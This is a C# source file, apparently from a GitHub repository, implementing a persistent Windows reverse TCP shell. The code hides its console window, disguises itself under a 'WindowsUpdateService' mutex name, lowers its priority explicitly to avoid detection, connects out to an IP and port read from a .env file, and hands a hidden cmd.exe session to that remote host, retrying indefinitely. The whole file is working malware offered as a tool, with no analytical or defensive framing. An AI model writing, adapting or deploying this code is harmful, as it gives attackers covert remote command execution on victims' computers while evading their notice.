Persistent-Reverse-TCP-Shell/shell.cs at main · EamonnPatt/Persistent-Reverse-TCP-Shell · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
// This code is meant to create a persistant reverse shell using tcp on windows. Developed on Debian
// -https://github.com/EamonnPatt/custom-reverse-shell
using System;
using System.Net.Sockets;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Threading;
using System.Runtime.InteropServices;

class Config {
    public static string GetEnvVariable(string key) {
        string envFile = ".env";
        if (File.Exists(envFile)) {
            foreach (string line in File.ReadAllLines(envFile)) {
                if (line.StartsWith(key + "=")) {
                    return line.Substring(key.Length + 1);
                }
            }
        }
        return null;
    }
}

class Program {
    // Declare these as static fields at the class level
    private static string ip;
    private static int port;

    [DllImport("kernel32.dll")]
    static extern IntPtr GetConsoleWindow();

    [DllImport("user32.dll")]
    static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

    [DllImport("user32.dll")]
    static extern int SetWindowLong(IntPtr hWnd, int nIndex, int dwNewLong);

    [DllImport("user32.dll")]
    static extern int GetWindowLong(IntPtr hWnd, int nIndex);

    const int SW_HIDE = 0;
    const int GWL_EXSTYLE = -20;
    const int WS_EX_TOOLWINDOW = 0x00000080;
    const int WS_EX_APPWINDOW = 0x00040000;

    static void Main(string[] args) {
        // Load environment variables first
        ip = Config.GetEnvVariable("localIP");
        port = int.Parse(Config.GetEnvVariable("myPORT"));

        // Check if already running (prevent multiple instances)
        bool createdNew;
        using (var mutex = new System.Threading.Mutex(true, "Global\\WindowsUpdateService", out createdNew)) {
            if (!createdNew) {
                return; // Already running, exit silently
            }

            // Hide everything
            var handle = GetConsoleWindow();
            ShowWindow(handle, SW_HIDE);

            try {
                int exStyle = GetWindowLong(handle, GWL_EXSTYLE);
                exStyle |= WS_EX_TOOLWINDOW;
                exStyle &= ~WS_EX_APPWINDOW;
                SetWindowLong(handle, GWL_EXSTYLE, exStyle);
            } catch { }

            // Lower process priority to avoid detection
            try {
                Process.GetCurrentProcess().PriorityClass = ProcessPriorityClass.BelowNormal;
            } catch { }

            // Random delay before connecting (0-60 seconds)
            Random rand = new Random();
            Thread.Sleep(rand.Next(0, 60000));

            // Run connection in background
            Thread backgroundThread = new Thread(ConnectBack);
            backgroundThread.IsBackground = true;
            backgroundThread.Start();

            Thread.Sleep(Timeout.Infinite);
        }
    }

    static void ConnectBack() {
        Random rand = new Random();

        while (true) {
            try {
                using (TcpClient client = new TcpClient(ip, port)) {
                    using (Stream stream = client.GetStream()) {
                        using (StreamReader reader = new StreamReader(stream)) {
                            using (StreamWriter writer = new StreamWriter(stream)) {
                                writer.AutoFlush = true;

                                Process process = new Process();
                                process.StartInfo.FileName = "cmd.exe";
                                process.StartInfo.CreateNoWindow = true;
                                process.StartInfo.UseShellExecute = false;
                                process.StartInfo.RedirectStandardOutput = true;
                                process.StartInfo.RedirectStandardInput = true;
                                process.StartInfo.RedirectStandardError = true;
                                process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;

                                process.OutputDataReceived += (s, e) => {
                                    if (e.Data != null) {
                                        try { writer.WriteLine(e.Data); } catch { }
                                    }
                                };
                                process.ErrorDataReceived += (s, e) => {
                                    if (e.Data != null) {
                                        try { writer.WriteLine(e.Data); } catch { }
                                    }
                                };

                                process.Start();
                                process.BeginOutputReadLine();
                                process.BeginErrorReadLine();

                                while (true) {
                                    string cmd = reader.ReadLine();
                                    if (cmd == null) break;
                                    process.StandardInput.WriteLine(cmd);
                                }

                                try { process.Kill(); } catch { }
                            }
                        }
                    }
                }
            } catch {
                // Random delay between 30-90 seconds before retry
                Thread.Sleep(rand.Next(30000, 90000));
            }
        }
    }
}